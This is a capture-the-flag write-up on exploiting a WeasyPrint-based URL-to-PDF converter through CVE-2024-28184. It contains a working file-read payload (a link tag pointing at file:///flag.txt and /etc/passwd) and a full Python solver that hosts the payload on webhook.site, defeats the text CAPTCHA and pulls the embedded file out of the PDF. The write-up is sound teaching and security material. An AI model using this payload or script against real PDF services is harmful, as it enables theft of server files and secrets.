Challenge: Web 2 Doc 2
Category: Web
Overview
Web 2 Doc 2 is a URL-to-PDF converter web application. Users submit a URL, solve a text-based CAPTCHA, and receive a PDF rendering of the target webpage. Under the hood, the application uses WeasyPrint 68.1 to convert fetched HTML into PDF documents.
The goal is to read the contents of /flag.txt on the server.
Reconnaissance
Identifying the Stack
Submitting a valid URL (e.g., https://example.com) and inspecting the resulting PDF reveals the producer:
Producer: WeasyPrint 68.1The application is a Flask app running Python 3.11, confirmed via AWS metadata and /proc/self/cmdline (later).
Application Flow
- User visits
/and receives a page with a random 6-character alphanumeric CAPTCHA (e.g.,X1QPNX). - User submits a URL and the CAPTCHA answer to
POST /convert. - The server validates the CAPTCHA, fetches the URL using
python-requests(withallow_redirects=Falseand anX-Fetcher: Internalheader), and passes the HTML to WeasyPrint for PDF conversion. - The generated PDF is returned to the user.
Source Code (recovered via the exploit itself)
Using the vulnerability described below, the full application source at /app/app.py was extracted:
from flask import Flask, render_template, request, send_file, jsonify, sessionimport requestsfrom weasyprint import HTML, default_url_fetcherimport ioimport osimport ipaddressfrom urllib.parse import urlparseimport secretsimport string
app = Flask(__name__)app.config['SECRET_KEY'] = os.urandom(24)
# ...captcha and helper functions...
@app.route('/convert', methods=['POST'])def convert(): url = request.form.get('url', '').strip() captcha_answer = request.form.get('captcha_answer', '').strip() # ...captcha validation... try: html_content = fetch_url_with_limit(url) pdf_file = SizeLimitedBytesIO() HTML(string=html_content).write_pdf(pdf_file) # <-- NO custom url_fetcher! pdf_file.seek(0) return send_file(pdf_file, mimetype='application/pdf', ...) except Exception as e: return jsonify({'error': f'Failed to convert to PDF'}), 500The critical line is:
HTML(string=html_content).write_pdf(pdf_file)No custom url_fetcher is provided. WeasyPrint’s default url_fetcher is used, which supports file://, data:, and http(s):// protocols without restriction.
Vulnerability
CVE-2024-28184 - WeasyPrint Arbitrary File Read via PDF Attachments
WeasyPrint supports the HTML <link rel="attachment"> tag, which embeds the referenced resource as a file attachment inside the generated PDF. When no custom url_fetcher restricts the protocols, an attacker can use file:// URIs to read arbitrary local files and have them embedded as PDF attachments.
<link rel="attachment" href="file:///etc/passwd">When WeasyPrint renders this HTML, it reads /etc/passwd from the local filesystem and embeds the contents as a binary attachment in the PDF. The attachment can then be extracted programmatically using a PDF library like pypdf.
Attack Chain
- Host a malicious HTML page on an attacker-controlled server (e.g., webhook.site).
- The HTML contains a
<link rel="attachment" href="file:///flag.txt">tag. - Submit the attacker’s URL to the converter with a valid CAPTCHA answer.
- The server fetches the HTML via
python-requests(this step doesn’t trigger the vulnerability). - WeasyPrint processes the HTML and encounters the
<link rel="attachment">tag. - WeasyPrint’s default
url_fetcherreadsfile:///flag.txtfrom the server’s filesystem. - The file contents are embedded as an attachment in the output PDF.
- Extract the attachment from the returned PDF.
Exploit
Step 1: Set Up Attacker-Controlled HTML
Create a webhook.site token configured to return:
<html><head> <link rel="attachment" href="file:///flag.txt"></head><body> <h1>Web 2 Doc v2</h1></body></html>Step 2: Automated Solver Script
import requestsimport reimport tempfileimport os
BASE = "http://52.59.124.14:5003"
def create_webhook(content): """Create a webhook.site token with custom HTML response.""" r = requests.post("https://webhook.site/token", json={ "default_status": 200, "default_content": content, "default_content_type": "text/html" }, timeout=10) uuid = r.json()['uuid'] return f"https://webhook.site/{uuid}"
def solve_captcha_and_convert(url): """Solve the text CAPTCHA and submit the URL for conversion.""" s = requests.Session() r = s.get(BASE + "/", timeout=15)
# Extract the CAPTCHA text from the page match = re.search(r'class="captcha-display">([^<]+)</div>', r.text) captcha = match.group(1).strip()
# Submit URL with solved CAPTCHA r = s.post(BASE + "/convert", data={ "url": url, "captcha_answer": captcha }, timeout=60) return r
def extract_attachments(pdf_bytes): """Extract file attachments from a PDF.""" from pypdf import PdfReader with tempfile.NamedTemporaryFile(suffix='.pdf', delete=False) as f: f.write(pdf_bytes) f.flush() try: reader = PdfReader(f.name) if reader.attachments: for name, data_list in reader.attachments.items(): return name, data_list[0] finally: os.unlink(f.name) return None, None
# Payload HTMLhtml = '''<html><head><link rel="attachment" href="file:///flag.txt"></head><body><h1>pwned</h1></body></html>'''
webhook_url = create_webhook(html)print(f"[*] Webhook: {webhook_url}")
r = solve_captcha_and_convert(webhook_url)if r.status_code == 200: name, data = extract_attachments(r.content) if data: print(f"[+] Flag: {data.decode()}") else: print("[-] No attachment found")Step 3: Run and Profit
$ python3 solve.py[*] Webhook: https://webhook.site/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx[+] Flag: ENO{weasy_pr1nt_can_h4v3_f1l3s_1n_PDF_att4chments!}Flag
ENO{weasy_pr1nt_can_h4v3_f1l3s_1n_PDF_att4chments!}